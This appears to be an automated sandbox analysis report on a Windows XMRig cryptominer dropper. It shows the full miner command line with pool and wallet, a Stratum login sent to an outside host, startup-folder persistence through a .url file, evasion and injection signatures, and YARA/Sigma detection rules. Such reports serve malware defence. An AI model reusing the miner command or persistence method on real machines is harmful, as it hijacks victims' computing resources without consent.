Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Vsob3IooE7.exe

Overview

General Information

Sample Name:Vsob3IooE7.exe
Original Sample Name:e7bf9f0c2c1977ddd8e139c13c27be0d.exe
Analysis ID:873923
MD5:e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1:e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256:a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
Tags:32CoinMinerexe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected AntiVM3
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Detected Stratum mining protocol
Machine Learning detection for sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Vsob3IooE7.exe (PID: 1796 cmdline: C:\Users\user\Desktop\Vsob3IooE7.exe MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 5184 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 6944 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 748 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
      • Driver.exe (PID: 6784 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Vsob3IooE7.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • Vsob3IooE7.exe (PID: 2068 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • Vsob3IooE7.exe (PID: 5176 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlURL_File_Local_EXEDetects an .url file that points to a local executableFlorian Roth (Nextron Systems)
    • 0x0:$s1: [InternetShortcut]
    • 0x14:$s2: URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
    • 0x14:$file: URL=file:///
    • 0x0:$url_explicit: [InternetShortcut]

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Vsob3IooE7.exe PID: 1796JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: Vsob3IooE7.exe PID: 748PUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
      • 0x561fa:$s03: -o pool.
      • 0x56307:$s03: -o pool.
      • 0x7a586:$s03: -o pool.
      • 0x7a648:$s03: -o pool.
      • 0x7ad12:$s03: -o pool.
      • 0x82b19:$s03: -o pool.
      • 0xd07cb:$s03: -o pool.
      • 0xd08d8:$s03: -o pool.
      • 0xe88a0:$s03: -o pool.
      • 0x10c01c:$s03: -o pool.
      • 0x10c127:$s03: -o pool.
      • 0x144fec:$s03: -o pool.
      Process Memory Space: Driver.exe PID: 6784JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

        Sigma Signatures

        Bitcoin Miner

        barindex
        Sigma detected: Xmrig
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: {path}, ParentImage: C:\Users\user\Desktop\Vsob3IooE7.exe, ParentProcessId: 748, ParentProcessName: Vsob3IooE7.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, ProcessId: 6784, ProcessName: Driver.exe

        Data Obfuscation

        barindex
        Sigma detected: Drops script at startup location
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Vsob3IooE7.exe, ProcessId: 748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: Vsob3IooE7.exeReversingLabs: Detection: 21%
        Source: Vsob3IooE7.exeVirustotal: Detection: 23%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeReversingLabs: Detection: 70%
        Machine Learning detection for sample
        Source: Vsob3IooE7.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJoe Sandbox ML: detected

        Bitcoin Miner

        barindex
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 6784, type: MEMORYSTR
        Found strings related to Crypto-Mining
        Source: Driver.exe, 00000007.00000000.450719664.0000000140001000.00000080.00000001.01000000.0000000A.sdmpString found in binary or memory: @cryptonight/0cn
        Detected Stratum mining protocol
        Source: global trafficTCP traffic: 192.168.2.5:49715 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"427x8gux5jrrgk4v7grcwk85mwpjcan7djgqbabcetdqc5bivy27pept3ctx43qmladkaardf4kw4hiozmdq7ehrnczdnfm","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
        Source: Vsob3IooE7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Vsob3IooE7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: Cassa.pdb source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: Cassa.pdbSHA256 source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: ZMm7.pdbSHA256#:=v source: Vsob3IooE7.exe
        Source: Binary string: ZMm7.pdb source: Vsob3IooE7.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02ECEC18
        Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
        Source: global trafficTCP traffic: 192.168.2.5:49715 -> 141.94.96.144:3333
        Source: Vsob3IooE7.exeString found in binary or memory: http://)/cmd.cgi?cmd=REL
        Source: Vsob3IooE7.exeString found in binary or memory: http://192.168.100.115/cmd.cgi?
        Source: Driver.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: Driver.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Driver.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Driver.exe.5.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
        Source: Driver.exe.5.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
        Source: Driver.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: Driver.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Driver.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: Driver.exe.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: Driver.exe.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
        Source: Driver.exe.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: Driver.exe.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Driver.exe.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: Driver.exe.5.drString found in binary or memory: http://ocsp.comodoca.com0
        Source: Driver.exe.5.drString found in binary or memory: http://ocsp.digicert.com0A
        Source: Driver.exe.5.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: Driver.exe.5.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000006.00000002.448788250.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: Vsob3IooE7.exe, 00000000.00000003.395584229.000000000626C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html(
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: Driver.exe.5.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
        Source: Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
        Source: Vsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
        Source: Vsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comue9
        Source: Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueTF
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: Vsob3IooE7.exe, 00000000.00000003.394136612.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.394272189.000000000626A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: Vsob3IooE7.exe, 00000000.00000003.397493268.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.397352751.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: Vsob3IooE7.exe, 00000000.00000003.424132747.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(w
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6w
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Cw
        Source: Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
        Source: Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Zw
        Source: Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hw
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/icro
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
        Source: Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Zw
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
        Source: Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~w
        Source: Vsob3IooE7.exe, 00000000.00000003.397352751.000000000626C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: Vsob3IooE7.exe, 00000000.00000003.391553068.000000000627B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comwdth
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
        Source: Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de9h
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deeg
        Source: Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: Driver.exe.5.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownDNS traffic detected: queries for: pool.supportxmr.com
        Source: Vsob3IooE7.exe, 00000000.00000002.424543381.0000000001229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
        Source: Vsob3IooE7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Process Memory Space: Vsob3IooE7.exe PID: 748, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPEDMatched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth (Nextron Systems), description = Detects an .url file that points to a local executable, score = , reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_015794A80_2_015794A8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_0157C1480_2_0157C148
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_0157A7580_2_0157A758
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC00400_2_02EC0040
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC81D00_2_02EC81D0
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC86680_2_02EC8668
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC6DB00_2_02EC6DB0
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC33E80_2_02EC33E8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC2BC80_2_02EC2BC8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC33DA0_2_02EC33DA
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC8BA80_2_02EC8BA8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC2BB90_2_02EC2BB9
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC8B980_2_02EC8B98
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02ECBB780_2_02ECBB78
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC28C80_2_02EC28C8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC28B90_2_02EC28B9
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC00060_2_02EC0006
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC81C00_2_02EC81C0
